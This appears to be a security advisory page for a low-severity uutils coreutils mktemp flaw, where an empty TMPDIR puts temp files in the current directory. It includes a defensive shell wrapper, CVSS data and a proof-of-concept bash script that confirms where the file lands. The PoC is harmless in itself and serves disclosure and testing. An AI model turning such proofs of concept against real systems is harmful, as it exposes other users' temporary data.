Security Vulnerability Report
CVE-2026-35342 CVSS 3.3 LOW

CVE-2026-35342

Published: 2026-04-22 17:16:36
Last Modified: 2026-05-04 20:11:32

Description

The mktemp utility in uutils coreutils fails to properly handle an empty TMPDIR environment variable. Unlike GNU mktemp, which falls back to /tmp when TMPDIR is an empty string, the uutils implementation treats the empty string as a valid path. This causes temporary files to be created in the current working directory (CWD) instead of the intended secure temporary directory. If the CWD is more permissive or accessible to other users than /tmp, it may lead to unintended information disclosure or unauthorized access to temporary data.
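The root cause is the difference between "unset" and "empty": GNU mktemp treats an empty TMPDIR as if it were unset and falls back to /tmp, while the affected uutils versions pass the empty string through, so the template is resolved relative to the current directory. The following POSIX shell helper, an added example that is not part of this advisory or of the uutils project, shows the safe resolution rule and a wrapper that hands mktemp an explicit directory so the result never depends on how the installed binary interprets TMPDIR. The function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the advisory or the uutils project): resolve the
# temporary directory the way GNU mktemp does, so that an unset OR empty
# TMPDIR falls back to /tmp rather than the current working directory.

# Print the directory temp files should go in. "${TMPDIR:-/tmp}" uses the
# ':-' form, which substitutes /tmp when TMPDIR is unset *or* empty. The
# plain "${TMPDIR-/tmp}" form would pass an empty string through, which is
# exactly the behaviour this CVE describes.
resolve_tmpdir() {
    printf '%s\n' "${TMPDIR:-/tmp}"
}

# Create a temp file under resolve_tmpdir() regardless of how the installed
# mktemp treats an empty TMPDIR: the directory is part of the template, so
# mktemp has nothing left to resolve from the environment. The optional
# argument is the file-name template (default tmp.XXXXXXXXXX).
safe_mktemp() {
    dir=$(resolve_tmpdir)
    mktemp "$dir/${1:-tmp.XXXXXXXXXX}"
}

# Return 0 if path $1 lies inside directory $2, 1 otherwise.
is_under_dir() {
    case "$1" in
        "$2"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Self-check for the installed mktemp: returns 0 when an empty TMPDIR still
# yields a file under /tmp (GNU behaviour), 1 when it landed elsewhere
# (for an affected uutils build that means the current directory).
check_installed_mktemp() {
    f=$(TMPDIR="" mktemp 2>/dev/null) || return 1
    rm -f "$f"
    is_under_dir "$f" /tmp
}

# Usage: f=$(TMPDIR="" safe_mktemp) always creates the file under /tmp;
# check_installed_mktemp && echo "mktemp falls back to /tmp" || echo "check TMPDIR handling"
```

In scripts, the practical mitigation is the same as the wrapper: never rely on a bare `mktemp` when TMPDIR may have been set to an empty string by a caller or a service manager; either pass a full template path or export a sane TMPDIR yourself before calling it.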

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils < 0.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35342
# This script demonstrates the vulnerability where an empty TMPDIR
# causes mktemp to create a file in the current working directory.

mkdir -p /tmp/vuln_test_dir
cd /tmp/vuln_test_dir || exit 1

# Simulate the vulnerable condition
export TMPDIR=""

# Run the vulnerable mktemp (assuming uutils version is used)
# If uutils is installed as 'mktemp', replace command accordingly
TEMP_FILE=$(mktemp)
echo "Created temp file: $TEMP_FILE"

# Verify if file is in CWD
if [ -f "$(basename "$TEMP_FILE")" ]; then
    echo "[!] Vulnerability confirmed: File created in CWD."
    ls -l "$(basename "$TEMP_FILE")"
else
    echo "[*] Safe behavior or PoC failed."
fi

# Cleanup
rm -f "$(basename "$TEMP_FILE")"
cd - > /dev/null
rmdir /tmp/vuln_test_dir

References

https://github.com/uutils/coreutils/pull/10566 (Issue Tracking, Patch)
https://github.com/uutils/coreutils/releases/tag/0.6.0 (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35342", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:36.217", "lastModified": "2026-05-04T20:11:32.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mktemp utility in uutils coreutils fails to properly handle an empty TMPDIR environment variable. Unlike GNU mktemp, which falls back to /tmp when TMPDIR is an empty string, the uutils implementation treats the empty string as a valid path. This causes temporary files to be created in the current working directory (CWD) instead of the intended secure temporary directory. If the CWD is more permissive or accessible to other users than /tmp, it may lead to unintended information disclosure or unauthorized access to temporary data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "87C33018-2E08-45B0-B69C-7FC224F7F883"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/10566", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.6.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}